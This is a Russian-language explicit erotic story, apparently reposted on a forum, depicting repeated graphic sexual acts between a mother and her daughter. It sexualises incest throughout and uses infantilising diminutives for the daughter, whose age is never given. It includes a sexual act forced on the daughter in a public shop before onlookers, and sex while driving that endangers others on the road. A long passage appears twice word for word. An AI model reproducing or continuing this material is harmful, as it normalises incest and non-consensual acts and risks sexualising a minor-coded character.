- Мам, пошли в сад! - кричала Анжелика мамочке.
- Пошли! - послышались крики из другой комнаты.
- Только давай голышом. - дерзко улыбнулась дочь.
- Хм. Ну давай.
На улице было прохладно, как раз для подобной прогулки. Участок у Ирины Алексеевны был громадным, вокруг в радиусе полкилометра никто не жил. В участок входил водоем и огромный сад, усаженный различными сортами яблок, груш, персиков, винограда и многого другого.
Мать и дочь, держась за ручки, вышли на порог коттеджа. Ирина захватила с собой покрывало. Им тут же стало немного холодно, и их тела покрылись пупырышками. Трава была еще сырая, это очень ощущается голыми ножками девушек. Они шли вдвоем, наслаждаясь пением птиц и ярким светом Солнца и этим ощущением свежести, прохлады. Мама сорвала с деревьев несколько слив и персик. Наконец они дошли до одной из беседок. Мама расстелила покрывало на лавке и села. Анжелика, немного подумав, сказала:
- Мамочка, можно я сяду тебе на коленки?
- Конечно, киса.
Мама и дочка прекрасно устроились на лавочке, они несколько минут сидели и молчали.
- Хочешь сливу? - спросила мама
- Угу
Мать взяла в рот ягоду и повернулась к дочери. Поедание ягоды превратилось в нечто среднее между поцелуем и приемом пищи.
Мама откусила половинку другой сливы и прислонилась оставшейся половинкой к груди дочери. Анжелика вздрогнула. Мама нежно обвела грудь дочери сливой и приблизилась к соску. Он так же не остался без внимания. Мама начала облизывать блестящие, красивейшие груди дочери. Когда она дошла до соска, она его сначала втянула, потом начала нежно покусывать. Когда очаровательные сисечки были вылизаны, мама направила сливу прямо к писе дочери. Мама вымазала соком всю поверхность писечки, бедра и анус, а саму сливу засунула во влагалище Анжелики. Анжелика была очень возбуждена, и ее выделения смешались с соком. Мама тут же решила попробовать на вкус это чудо. Анжелика села на стол и расставила ножки, а мамочка начала вылизывать ее там. Этот вкус был просто неповторимым.
- Анжелика, хочешь? - сказала мама, показывая дочери влажные пальчики?
- Да-а-а, конечно м-м-м-мамочка, я тебя обожаю.
Когда мама вылизала все у Анжелики, она полезла язычком в лоно дочери. Там томилась сочная слива. Языком ее не достать, и мама сделала это двумя пальчиками. В этот момент дочь бурно кончила. В очередной раз вылизав выделения, мама и дочь съели, наверное, самую вкусную в мире сливу.
Когда Ирина Алексеевна и Анжелика вернулись в дом, было уже около 12. 00.
Они зашли в душевую кабинку и помыли друг дружку, сильно не придаваясь утехам.
Вышли они, обернутые в большие, махровые полотенца. Они легли на кровать, повернувшись друг к другу лицом.
- Анжелика, надо срочно за продуктами съездить. Ты поедешь?
- Ай, мам, давай завтра.
- Ну Анжелика. Мне одной так скучно. Ну что мне для тебя сделать?
- Мам, я хочу в попку, ну пожалуйста.
- Ну неужели ты не понимаешь, что я это для тебя делаю? Она у тебя такая сладенькая, я не хочу, что бы твоя дырочка стала большой.
- А ты уже ебалась и у тебя тоже не большая!
- Ну ладно, котик, только когда приедем, тогда и попробуем.
Когда они собрались, было около 14. 00. До города ехать около получаса. Анжелика надела узенькую джинсовую юбочку и маечку, мама - красивое платье выше колена. Наконец послышался гул двигателя автомобиля, и Анжелика вместе с мамой покинули особняк. Ехать было скучно, и Анжелика полезла изящной лодыжкой маме между ног. От неожиданности Ирина вздрогнула и машину кивнуло в сторону.
- Анжелика! Вот неугомонная, неужели тебе все мало?
- Ну все равно делать нечего, я хочу ее просто потрогать.
- Не надо, ты мне мешаешь.
- Ну я чуть-чуть.
Анжеликина рука вновь оказалась между ног мамы. Сначала Анжелика просто гладила, а потом вошла одним пальчиком в мамину промежность. Маме бесспорно... стало это нравиться и она стала тихо постанывать. Потом Анжелика на миг высунула руку и облизала средний пальчик. Этим пальчиком она уперлась в анус мамы, но на этом не стала останавливаться. Да, она вошла в мамину попку, а второй пальчик вошел во влагалище зрелой женщины.
Несколько движений и мать бурно кончила и, не контролируя себя, втопила педаль газа что было сил. Анжелика очень испугалась и тут же убрала руку прочь. Оргазм у Ирины Алексеевны был не долгим, ее дыхание выровнялось, и скорость автомобиля уменьшилась. В машине воцарилась абсолютная тишина.
- Кстати, а почему ты без трусиков? - решила прервать тишину Анжелика
Мама посмотрела на себя и со смехом сказала:
- Это ж надо забыла. А у тебя собственно есть?
Анжелика задумалась, потом нырнула рукой под юбку и со смехом произнесла:
- Блин, тоже нет.
Они хихикали всю дорогу.
Вскоре приехали в магазин, и довольно долго закупались продуктами.
Анжелика очень долго выбирала огурец, которым собралась трахать свою попку. Она стояла там, где людей почти не было и мама решила отомстить маленькой лесбиянке. Она подошла к дочке, взяла широкий, но короткий огурец и резко сунула в нежную киску дочки. Анжелика аж взвыла от таких ощущений. Крик Анжелики привлек посетителей магазина и на нее стали глазеть. Мама взяла дочь за руку и повела к кассе. Но Анжелике очень не хотелось идти, ведь в ее маленькой писе торчал огурец. Она покрылась потом, покраснела, но терпеть надо было, она уже с мамой стояла в очереди.
Когда мама и дочь вышли из магазина, Анжелика мигом залезла в машину, взяла огурец в руку и начала им двигать туда-сюда с бешеной скоростью. Она кончила так, что от ее крика чуть стекла в машине не вынесло. Ирина лишь наблюдала с иронией за своей дочерью.
В магазине провели много времени, день подходил к концу и две очаровательные девушки на закате дня возвращались домой.
Проезжая мимо озера мама сказала:
- Слушай, давай искупнемся, вода должна быть просто горячей
- Конечно, пошли
Машину Ирина остановила около самого берега. Девочки вышли и разделись. Они взялись за руки и пошли в воду. Медленно, но верно они дошли до уровня плеч. Они обнялись и их груди прикоснулись, они начали нежно целоваться. Анжелика поставила свою ножку между мамиными, и мама сделала аналогично. Прошло немного времени и они кончили, тихо, красиво. Им больше ничего в мире не нужно, они стали одним целым. Так они простояли довольно долго, потом, немножко поплавав, они стали собираться домой. За весь день девушки очень устали и мигом заснули.
© Ирина Т.
Ejamar
Поделиться3031 Май 2015 05:10:33 pm
Rufad
Анжелика и мама Ирина Алексеевна
Анжелика проснулась оттого, что у нее в промежности было очень жарко. Это ее мамочка с удовольствием облизывала писечку дочери. Влажные от смазки губки Анжеликиной писечки раскрылись и просто не могли устоять перед маминым язычком. Заботливая мамочка начала погружать свой горячий язычок внутрь, потом она перешла выше и начала засасывать уже набухший клитор дочери. Анжелика была уже на грани, весь дом наполнился сладкими стонами оргазма, и дочь наконец-то кончила.
Так начиналось каждое утро в доме Анжелики и ее мамы - Туйзаровой Ирины Алексеевны. Они очень любили доставлять друг дружке удовольствие. Мама и дочь договорились, что когда кто-то из них проснется первее, сразу же вылизывает писечку. Они не упускали возможность сделать приятно друг дружке. Мамочка и доченька занимались этим везде: в кровати, на коридоре, в ванной, на улице, на пороге возле дома, на балконе, на кухне и черт знает где еще.
Жили они крайне беззаботно и не ограничивали себя ни в чем.
Анжелика проснулась довольно рано. Было около 6.00. За окном только вставало солнышко, радостно пели птички. Озеро, которое находилось недалеко от дома, было тихим как никогда. На его поверхности клубился пар. Анжелика встала с кровати и смотрела на эту красоту несколько минут. Мама еще спала и Анжелика подумала, что сейчас самое время сделать ей приятно. Мамочка лежала на животе, ее очаровательные ножки были немного раздвинуты, как будто готовы к тому, что сейчас должно произойти. Анжелика откинула одеяло и прикоснулась своими розовыми губками к нежной маминой шее, потом аккуратно, кончиком язычка она опустилась до плеч. Потом она стала покрывать поцелуями спину матери и скоро дошла до сладких булочек.
Заботливая дочь немножко раздвинула мамину попку и провела горячим язычком между половинками, потом остановилась на анусе. Анальным сексом они занимались редко, поэтому дырочка у Ирины была очень тесная. Посверлив язычком мамину дырочку, дочь решила пойти дальше. Мамина киска уже горела, мясистые губки набухли и открыли вход во влагалище, с них уже начинал капать божественный сок, который сводил Анжелику с ума. Анжелика язычком сначала дотронулась внутренней стороны бедер мамочки и, облизав их, подошла к писе. Она слизала нависшие на маминой писе драгоценные капли, после чего отправила свой проворный язычок в лоно матери. До клитора языком достать было невозможно, поэтому Анжелике пришлось потрудиться. Мама кончила, и из ее киски вылилось большое количество жидкости. Анжелика с удовольствием вылизала мамку, потом пошла умываться.
Она решила сделать маме еще приятней и приготовила кофе с тостами. Когда она пришла в спальню, мама уже сидела на кровати у спинки. На маме была одета только коротенькая маечка. Мамочка сидела, аккуратно сдвинув стройные ножки, и улыбалась дочери
- Доброе утро, киса.
- Доброе утро, мам. Твоей писечке понравился мой язычок сегодня?
- Конечно, прелесть моя! Иди сюда.
Анжелика села на кровать, и поставила перед собой и мамой завтрак.
Они начали страстно целоваться, то взасос, то лишь касались друг дружку порхающими язычками.
- Котик, я тебя обожаю. - ласково сказала мать дочке
- Мамочка, я тебя тоже
Скоро они скушали завтрак, Анжелика пошла мыть посуду, а мама заправляла постель. На маме была все та же майка, а дочка одела белого цвета свободную рубашку, которая еле прикрывала ее киску, а сзади очень была видна попка. Мама довольно быстро управилась, и когда пришла на кухню, Анжелика все еще мыла посуду.
Мамочка подошла к ней сзади, села на корточки, и попка дочки была как раз напротив мамочки. Мать начала скользить язычком по внутренней стороне бедер. Это место нравилось и маме и дочке, поэтому они всегда уделяли внимание ему. Потом она перешла к влагалищу дочки, немного его полизав, она просто втянула кисочку дочки к себе в рот. Анжелика от удовольствия аж прогнулась. Ласкав дочь, мама теребила и свой клитор. После, мамочкин остренький язычок перешел к анусу дочки, а два длинных пальчика с изящными коготками вошли в киску Анжелики. Кончили они вдвоем. Мамочка заботливо слизывала Анжеликины соки с ее прекрасных ножек.
На дворе лето. Уже 8. 00.
- Мам, пошли в сад! - кричала Анжелика мамочке.
- Пошли! - послышались крики из другой комнаты.
- Только давай голышом. - дерзко улыбнулась дочь.
- Хм. Ну давай.
На улице было прохладно, как раз для подобной прогулки. Участок у Ирины Алексеевны был громадным, вокруг в радиусе полкилометра никто не жил. В участок входил водоем и огромный сад, усаженный различными сортами яблок, груш, персиков, винограда и многого другого.
Мать и дочь, держась за ручки, вышли на порог коттеджа. Ирина захватила с собой покрывало. Им тут же стало немного холодно, и их тела покрылись пупырышками. Трава была еще сырая, это очень ощущается голыми ножками девушек. Они шли вдвоем, наслаждаясь пением птиц и ярким светом Солнца и этим ощущением свежести, прохлады. Мама сорвала с деревьев несколько слив и персик. Наконец они дошли до одной из беседок. Мама расстелила покрывало на лавке и села. Анжелика, немного подумав, сказала:
- Мамочка, можно я сяду тебе на коленки?
- Конечно, киса.
Мама и дочка прекрасно устроились на лавочке, они несколько минут сидели и молчали.
- Хочешь сливу? - спросила мама
- Угу
Мать взяла в рот ягоду и повернулась к дочери. Поедание ягоды превратилось в нечто среднее между поцелуем и приемом пищи.
Мама откусила половинку другой сливы и прислонилась оставшейся половинкой к груди дочери. Анжелика вздрогнула. Мама нежно обвела грудь дочери сливой и приблизилась к соску. Он так же не остался без внимания. Мама начала облизывать блестящие, красивейшие груди дочери. Когда она дошла до соска, она его сначала втянула, потом начала нежно покусывать. Когда очаровательные сисечки были вылизаны, мама направила сливу прямо к писе дочери. Мама вымазала соком всю поверхность писечки, бедра и анус, а саму сливу засунула во влагалище Анжелики. Анжелика была очень возбуждена, и ее выделения смешались с соком. Мама тут же решила попробовать на вкус это чудо. Анжелика села на стол и расставила ножки, а мамочка начала вылизывать ее там. Этот вкус был просто неповторимым.
- Анжелика, хочешь? - сказала мама, показывая дочери влажные пальчики?
- Да-а-а, конечно м-м-м-мамочка, я тебя обожаю.
Когда мама вылизала все у Анжелики, она полезла язычком в лоно дочери. Там томилась сочная слива. Языком ее не достать, и мама сделала это двумя пальчиками. В этот момент дочь бурно кончила. В очередной раз вылизав выделения, мама и дочь съели, наверное, самую вкусную в мире сливу.
Когда Ирина Алексеевна и Анжелика вернулись в дом, было уже около 12. 00.
Они зашли в душевую кабинку и помыли друг дружку, сильно не придаваясь утехам.
Вышли они, обернутые в большие, махровые полотенца. Они легли на кровать, повернувшись друг к другу лицом.
- Анжелика, надо срочно за продуктами съездить. Ты поедешь?
- Ай, мам, давай завтра.
- Ну Анжелика. Мне одной так скучно. Ну что мне для тебя сделать?
- Мам, я хочу в попку, ну пожалуйста.
- Ну неужели ты не понимаешь, что я это для тебя делаю? Она у тебя такая сладенькая, я не хочу, что бы твоя дырочка стала большой.
- А ты уже ебалась и у тебя тоже не большая!
- Ну ладно, котик, только когда приедем, тогда и попробуем.
Когда они собрались, было около 14. 00. До города ехать около получаса. Анжелика надела узенькую джинсовую юбочку и маечку, мама - красивое платье выше колена. Наконец послышался гул двигателя автомобиля, и Анжелика вместе с мамой покинули особняк. Ехать было скучно, и Анжелика полезла изящной лодыжкой маме между ног. От неожиданности Ирина вздрогнула и машину кивнуло в сторону.
- Анжелика! Вот неугомонная, неужели тебе все мало?
- Ну все равно делать нечего, я хочу ее просто потрогать.
- Не надо, ты мне мешаешь.
- Ну я чуть-чуть.
Анжеликина рука вновь оказалась между ног мамы. Сначала Анжелика просто гладила, а потом вошла одним пальчиком в мамину промежность. Маме бесспорно... стало это нравиться и она стала тихо постанывать. Потом Анжелика на миг высунула руку и облизала средний пальчик. Этим пальчиком она уперлась в анус мамы, но на этом не стала останавливаться. Да, она вошла в мамину попку, а второй пальчик вошел во влагалище зрелой женщины.
Несколько движений и мать бурно кончила и, не контролируя себя, втопила педаль газа что было сил. Анжелика очень испугалась и тут же убрала руку прочь. Оргазм у Ирины Алексеевны был не долгим, ее дыхание выровнялось, и скорость автомобиля уменьшилась. В машине воцарилась абсолютная тишина.
- Кстати, а почему ты без трусиков? - решила прервать тишину Анжелика
Мама посмотрела на себя и со смехом сказала:
- Это ж надо забыла. А у тебя собственно есть?
Анжелика задумалась, потом нырнула рукой под юбку и со смехом произнесла:
- Блин, тоже нет.
Они хихикали всю дорогу.
Вскоре приехали в магазин, и довольно долго закупались продуктами.
Анжелика очень долго выбирала огурец, которым собралась трахать свою попку. Она стояла там, где людей почти не было и мама решила отомстить маленькой лесбиянке. Она подошла к дочке, взяла широкий, но короткий огурец и резко сунула в нежную киску дочки. Анжелика аж взвыла от таких ощущений. Крик Анжелики привлек посетителей магазина и на нее стали глазеть. Мама взяла дочь за руку и повела к кассе. Но Анжелике очень не хотелось идти, ведь в ее маленькой писе торчал огурец. Она покрылась потом, покраснела, но терпеть надо было, она уже с мамой стояла в очереди.
Когда мама и дочь вышли из магазина, Анжелика мигом залезла в машину, взяла огурец в руку и начала им двигать туда-сюда с бешеной скоростью. Она кончила так, что от ее крика чуть стекла в машине не вынесло. Ирина лишь наблюдала с иронией за своей дочерью.
В магазине провели много времени, день подходил к концу и две очаровательные девушки на закате дня возвращались домой.
Проезжая мимо озера мама сказала:
- Слушай, давай искупнемся, вода должна быть просто горячей
- Конечно, пошли
Машину Ирина остановила около самого берега. Девочки вышли и разделись. Они взялись за руки и пошли в воду. Медленно, но верно они дошли до уровня плеч. Они обнялись и их груди прикоснулись, они начали нежно целоваться. Анжелика поставила свою ножку между мамиными, и мама сделала аналогично. Прошло немного времени и они кончили, тихо, красиво. Им больше ничего в мире не нужно, они стали одним целым. Так они простояли довольно долго, потом, немножко поплавав, они стали собираться домой. За весь день девушки очень устали и мигом заснули.
© Ирина Т.
Ogeg